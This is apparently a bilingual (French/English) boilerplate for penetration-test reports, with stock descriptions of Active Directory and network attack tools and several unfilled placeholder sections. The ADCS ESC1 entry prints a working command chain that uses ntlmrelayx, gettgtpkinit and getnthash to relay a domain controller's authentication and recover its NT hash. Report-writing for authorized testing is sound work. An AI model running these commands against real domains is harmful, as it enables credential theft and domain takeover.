Reporting boilerplates
Attacks
NTLMv1 to LDAPS without signature
French
Lorem ipsum
English Lorem ipsum
ADCS ESC1
French
Lorem ipsum
ntlmrelayx.py -t http://<remote host>/certsrv/certfnsh.asp -smb2support --adcs --template DomainControllerpython gettgtpkinit.py '<DOMANIN>/<RELAYED_DC_MACHINE_ACCOUNT>' -pfx-base64 $(cat <path to base64 output from ntlmrelayx>) <where to save ccache>KRB5CCNAME=<path to ccache> python getnthash.py -key '<AS-REP key obtained from the above command>' '<relayed DC>'English Lorem ipsum
Tools
BloodHound
French Les testeurs ont utilisé l'outils de cartographie et d'analyse BloodHound (https://github.com/BloodHoundAD/BloodHound). Cet outils permet de visualisé des données receuillies par des requêtes LDAP.
English
To confirm this issue, the testers used an Active Directory cartography and analysis tool called BloodHound (https://github.com/BloodHoundAD/BloodHound). This tool starts by collecting data from the Active Directoy instance via LDAP queries and imports this data into a database. The database can then be queried to obtain information on potential misconfigurations.
The testers used the following Cipher query to [...]
Nuclei
French Lorem ipsum
English
To confirm this issue, the testers used Nuclei (https://github.com/projectdiscovery/nuclei), a vulnerability scanner developed by Project Discovery. Nuclei operates by employing predefined templates or "nuclei signatures" to systematically send targeted requests to web servers, effectively identifying security weaknesses and misconfigurations in web applications.
Metasploit Framework
French Lorem ipsum
English
To exploit identified vulnerabilities, the testers utilized the Metasploit Framework (https://github.com/rapid7/metasploit-framework), a versatile penetration testing tool.
NetExec
French
Les testeurs ont utilisé NetExec (https://github.com/Pennyw0rth/NetExec), un outil open source de post-exploitation et de test de pénétration conçu pour automatiser diverses tâches lors d'évaluations de sécurité. En particulier, ils ont utilisé le module MODULE_NAME pour identifier [...]
English
The testers used NetExec (https://github.com/Pennyw0rth/NetExec) an open-source post-exploitation and penetration testing tool designed to automate a variety of tasks during security assessments. In particular, they used the MODULE_NAME module to identify [...]
rdp-sec-check
French
Afin de confirmer cette vulnérabilité, les testeurs ont utilisé dp-sec-check (https://github.com/CiscoCXSecurity/rdp-sec-check). Un outil qui permet d'énumérer les configurations de sécurités d'un serveur de Bureau à Distance (Terminal Services).
English
To confirm this issue, the testers used rdp-sec-check (https://github.com/CiscoCXSecurity/rdp-sec-check) a script to enumerate security settings of an RDP Service (AKA Terminal Services).
kerbrute
French
Afin de confirmer cette vulnérabilité, les testeurs ont utilisé kerbrute (https://github.com/ropnop/kerbrute), un outil permettant de pulvériser des mots de passe et enumérer les utilisateurs Active Directory valident à l'aide de Kerberos Pre-Authentication.
English
To confirm this issue, the testers used kerbrute (https://github.com/ropnop/kerbrute), a tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.
Responder
French
Afin de confirmer cette vulnérabilité, les testeurs ont utilisé Responder (https://github.com/lgandx/Responder), un outil qui permet d'empoisonné divers protocoles de résolution de nom désuets.
English
To confirm this issue, the testers used Responder (https://github.com/lgandx/Responder), a network protocol poisoner and relay.
Coercer
French Lorem ipsum
English
The testers used Coercer (https://github.com/p0dalirius/Coercer), a tool to automatically coerce a Windows host to authenticate on an arbitrary machine through many methods.
Impacket
French
Afin de confirmer cette vulnérabilité, les testeurs ont utilisé le script secretsdump.py de la librairie Impacket (https://github.com/fortra/impacket/blob/master/examples/secretsdump.py).
Cet outil permet de récupérer le contenu de Local Security Authority (LSA) ainsi que les ruches de registre SAM, SECURITY et SYSTEM.
English Lorem ipsum
BloodHound ingestor / Neo4J
French
Les testeurs ont utilisé les données recceuillies pendant la période de reconnaissance afin d'effectuer une recherche sur [...]